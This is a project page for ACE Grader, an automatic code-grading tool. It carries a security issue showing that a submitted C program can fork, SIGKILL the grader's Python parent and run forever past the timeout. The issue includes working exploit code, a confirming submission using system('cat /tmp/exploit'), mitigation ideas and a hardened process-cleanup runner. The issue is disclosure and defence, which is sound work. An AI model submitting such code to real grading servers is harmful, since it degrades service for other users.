ace_grader's Introduction

ACE Grader

Automatic Code Evaluator and Grader

ACE Grader was developed as part of my Master's Dissertation in Software Engineering at Universidade do Minho. I was supervised by Professor Pedro Rangel Henriques and Professor Alda Gancarski.

What is ACE Grader?

ACE Grader, as the name implies, is an automatic grading solution for programming exercises! It uses a combination of dynamic and static analysis in order to evaluate submitted programs.

What is static analysis?

Unlike dynamic analysis, which only looks at a program's output, static analysis looks at the program itself. For example, ACE Grader can check if a function is recursive, unlike most automatic grading software. This can be extremely useful for grading introductory programming exercises, where students must use a specific concept in order to solve a problem.


To start your Phoenix server:

  • Install dependencies with mix deps.get
  • Create and migrate your database with mix ecto.setup
  • Start Phoenix endpoint with mix phx.server or inside IEx with iex -S mix phx.server

Now you can visit localhost:4000 from your browser.

Ready to run in production? Please check our deployment guides.

ace_grader's Issues

DoS exploit

Vulnerability description

In grader.py, the user code is run with a timeout of 5 seconds:

result = subprocess.run(['./main'], input=test_input.encode(), capture_output=True, timeout=5, check=True)

However, in *NIX systems, if a process kills its parent, it'll become orphaned, and will be adopted by the init system (systemd, openrc, ...). In that case, the timeout becomes meaningless (as Python, now dead, can no longer kill its child), and the program keeps running forever.

If the program, after killing its parent, started running a stress test, it'd be detrimental for server performance, and the server could be unable to accept requests from other users.

Example code

The following example uses the helloworld problem to run the exploit, but any other problem would be suitable for doing so:

#include <stdio.h>
#include <stdlib.h>

#include <signal.h>
#include <unistd.h>

void helloworld() {
	/*
	 * Fork before killing the parent. If the parent (Python?) were
	 * directly killed, the front-end reports an Internet connection error,
	 * and nothing is actually run.
	 */
	pid_t fork_result = fork();
	if (fork_result == 0) {
		/* Child process kills the parent and gets orphaned. */
		pid_t parent = getppid();
		kill(parent, SIGKILL);

		/*
		 * Insert stress test here. This example only writes to
		 * /tmp/exploit periodically, to show that the process can keep
		 * running forever.
		 */
		for (int i = 0;; ++i) {
			FILE *f = fopen("/tmp/exploit", "w");
			fprintf(f, "%d\n", i);
			fclose(f);
			sleep(5);
		}
	}
}

In this example, to assert that the process is running forever, the following code can be submitted:

#include <stdlib.h>

void helloworld() {
	system("cat /tmp/exploit"); /* Simpler than reading a file in C :-) */
}

The number of 5-second intervals since the program started running will be shown as a wrong answer.

Mitigations

There are likely easier ways to stop a process from killing its parent, but here are the ones that come to mind:

  • Using seccomp BPF, to filter the syscalls that a process can use;

  • Using ptrace to intercept (and, in this case, block) certain syscalls, as is done in this article.
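The cleanup the mitigations above are reaching for, written as a drop-in replacement for the subprocess.run() call in grader.py, is an added example and not ACE Grader's own code: it runs the submission in its own session, kills that whole process group however the direct child ended, registers the grader as a child subreaper so orphaned grandchildren are re-parented to it and can be reaped, and caps CPU time so an orphaned stress test dies on its own. It assumes Linux; all function and constant names are my own, and the sh -c commands are constructed stand-ins for a compiled ./main, one of them leaving a background orphan behind exactly as the forked child in the exploit does.

```python
"""Hardened replacement for the single subprocess.run() call in grader.py.
Added example, not ACE Grader's code. Linux only (prctl, process groups)."""
import ctypes, os, resource, signal, subprocess, time

PR_SET_CHILD_SUBREAPER = 36   # prctl(2) option: orphans re-parent to us, not to init
CPU_SECONDS, MAX_PROCS = 5, 256

def _child_limits():
    # Runs in the child just before exec. A CPU-bound "stress test" is killed by
    # the kernel once RLIMIT_CPU is exhausted, even if it manages to get orphaned.
    for res, lim in ((resource.RLIMIT_CPU, CPU_SECONDS), (resource.RLIMIT_NPROC, MAX_PROCS)):
        _, hard = resource.getrlimit(res)
        lim = lim if hard == resource.RLIM_INFINITY else min(lim, hard)
        resource.setrlimit(res, (lim, lim))

def _reap_descendants(grace=2.0):
    """Collect every descendant re-parented to us; returns how many were reaped."""
    reaped, end = 0, time.monotonic() + grace
    while time.monotonic() < end:
        try:
            pid, _ = os.waitpid(-1, os.WNOHANG)
        except ChildProcessError:
            break                      # ECHILD: nothing of ours is left at all
        if pid == 0:                   # a descendant still exists; let SIGKILL land
            time.sleep(0.01)
            continue
        reaped += 1
    return reaped

def run_submission(cmd, test_input, timeout=5.0):
    """Returns (status, stdout, reaped); status is 'ok', 'error' or 'timeout'."""
    libc = ctypes.CDLL(None, use_errno=True)
    libc.prctl(PR_SET_CHILD_SUBREAPER, 1, 0, 0, 0)
    # start_new_session puts the submission and everything it forks into a fresh
    # process group whose id equals proc.pid, so the whole tree can be signalled.
    proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, start_new_session=True,
                            preexec_fn=_child_limits)
    try:
        out, _ = proc.communicate(test_input, timeout=timeout)
        status = "ok" if proc.returncode == 0 else "error"
    except subprocess.TimeoutExpired as exc:
        out, status = exc.stdout or b"", "timeout"
    finally:
        try:
            os.killpg(proc.pid, signal.SIGKILL)   # direct child AND its orphans
        except ProcessLookupError:
            pass                                  # group is already empty
        proc.wait()
        for f in (proc.stdin, proc.stdout, proc.stderr):
            f.close()
        reaped = _reap_descendants()
    return status, out, reaped

# Constructed stand-ins for ./main: a clean run, and one that backgrounds an
# orphan (fds closed so it cannot hold the output pipe open) before exiting 0.
CLEAN = ["sh", "-c", "cat"]
ORPHANING = ["sh", "-c", "(sleep 60 </dev/null >/dev/null 2>&1 &); echo done"]
```

A descendant that calls setsid() itself leaves the process group and escapes the killpg, so in production back this with a dedicated uid or a PID namespace for the submission, as the seccomp or ptrace filters above would also require.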
